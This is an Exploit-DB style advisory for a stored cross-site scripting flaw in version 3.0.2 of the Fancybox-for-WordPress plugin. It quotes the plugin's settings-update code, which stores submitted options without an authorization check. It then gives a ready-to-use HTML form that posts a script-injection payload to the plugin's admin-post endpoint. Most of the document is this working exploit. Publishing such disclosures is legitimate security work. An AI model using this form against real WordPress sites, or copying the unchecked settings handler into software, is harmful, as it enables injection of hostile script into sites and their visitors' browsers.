exploit-db-mirror/exploits/php/webapps/36087.txt

# Exploit Title: Wordpress plugin Fancybox-for-WordPress Stored XSS
# Exploit Author: NULLpOint7r
# Date: 2015-02-11
# Contact me: seidbenseidok@gmail.com
# Version: 3.0.2
# Download link: https://downloads.wordpress.org/plugin/fancybox-for-wordpress.3.0.2.zip
# Home: http://www.sec4ever.com/home/

vulnerable code [fancybox.php]:
342.    if ( isset($_GET['page']) && $_GET['page'] == 'fancybox-for-wordpress' ) {
343.
344.        if ( isset($_REQUEST['action']) && 'update' == $_REQUEST['action'] ) {
345.
346.            $settings = stripslashes_deep( $_POST['mfbfw'] );
347.            $settings = array_map( 'convert_chars', $settings );
348.
349.            update_option( 'mfbfw', $settings );
350.            wp_safe_redirect( add_query_arg('updated', 'true') );

exploit:

<form method="POST" action="http://127.0.0.1/wp-admin/admin-post.php?page=fancybox-for-wordpress">
    <input type="text" name="action" value="update">
    <input type="text" name="mfbfw[padding]" value="</script><script>alert(/Owned by someone/)</script>">
    <input type="submit" value="Send">
</form>